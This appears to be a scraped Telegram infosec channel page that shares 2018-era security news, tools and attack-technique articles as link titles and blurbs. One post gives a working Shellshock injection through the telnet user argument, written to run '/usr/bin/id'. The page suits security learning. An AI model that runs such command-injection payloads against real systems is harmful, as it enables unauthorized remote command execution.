cKure
@cKure
6.57K
subscribers
1.35K
photos
320
videos
270
files
12K
links
﷽
This channel was created in 2018 and contains content from the information security domain.
This channel is primarily run by AI bots (n8n).
Archive:
ckure.esy.es
Criticals:
@ckuRED
linkedin.com/company/ckure
Support
📨
i@ckure.org
Download Telegram
Join
cKure
6.57K subscribers
cKure
https://github.com/GouveaHeitor/nipe
GitHub
GitHub - htrgouvea/nipe: An engine to make Tor network your default gateway
An engine to make Tor network your default gateway - htrgouvea/nipe
cKure
https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html
Fortinet Blog
Microsoft Windows Remote Kernel Crash Vulnerability
At the end of January 2018, the FortiGuard Labs team discovered a remote kernel crash vulnerability in Microsoft Windows and reported it to Microsoft by following Fortinet’s responsible disclosure …
cKure
https://github.com/OWASP/owasp-mstg#reading-the-mobile-security-testing-guide
GitHub
GitHub - OWASP/mastg: The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security…
The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the OWA...
cKure
https://gbhackers-com.cdn.ampproject.org/c/s/gbhackers.com/bypass-firewall-command-control/amp/
GBHackers Security | #1 Globally Trusted Cyber Security News Platform
Bypass Firewall and permits command and control to the external network
Attackers can use these techniques to bypass Firewall collect and forward sensitive information from your network or to attack or spam other networks.
cKure
https://n0where.net/satellite-tracking-application-gpredict
cKure
https://www.bleepingcomputer.com/news/security/vendor-patches-seven-vulnerabilities-across-392-camera-models/
BleepingComputer
Vendor Patches Seven Vulnerabilities Across 392 Camera Models
Axis Communications AB, a Swedish manufacturer of network cameras for physical security and video surveillance, has patched seven security flaws across nearly 400 security camera models.
cKure
https://nakedsecurity.sophos.com/2018/06/18/dark-web-drug-dealer-betrayed-by-his-beard-pleads-guilty/amp/
Sophos News
Naked Security – Sophos News
cKure
https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html
Markitzeroday
Gaining Domain Admin from Outside Active Directory
…or why you should ensure all Windows machines are domain joined.
cKure
https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
Google Cloud Blog
Bring Your Own Land (BYOL) — A Novel Red Teaming Technique | Mandiant | Google Cloud Blog
cKure
https://www.avanan.com/resources/zerofont-phishing-attack
Avanan
ZeroFont Phishing: Font Manipulation to Pass Microsoft Security
ZeroFont manipulation is inserting hidden words in font size zero—invisible to recipients—in order to fool Microsoft's natural language processing security.
cKure
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
GitHub
GitHub - tanprathan/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection…
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - tanprathan/MobileApp-Pentest-Chea...
cKure
https://0day.city/windows-0day-176336.html
cKure
https://www.sxcurity.pro/advanced-cors-techniques/
cKure
https://blog.netspi.com/tokenvator-a-tool-to-elevate-privilege-using-windows-tokens/
NetSPI
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
Tokenvator: A Tool to Elevate Privilege using Windows Tokens – It works by impersonating or altering authentication tokens in processes that the executing process has the appropriate level of permissions to.
cKure
Did you know that you can exploit shellshock via telnet (user arg), try with:
telnet
192.168.0.1
-l "() { :;}; /usr/bin/id"
cKure
https://arstechnica.com/information-technology/2018/06/china-based-hackers-burrow-inside-satellite-defense-and-telecoms-firms/
Ars Technica
China-based hackers burrow inside satellite, defense, and telecoms firms
Hackers may have sought ability to disrupt consumer and business communications.
cKure
cKure
cKure
cKure
http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/
Hacking Articles
Multiple Ways to Get root through Writable File
In Linux, everything is a file, including directories and devices that have permissions to allow or restricted three operations i.e. read/write/execute. When admin set permission
cKure
Instagram vulnerability causes breach of privacy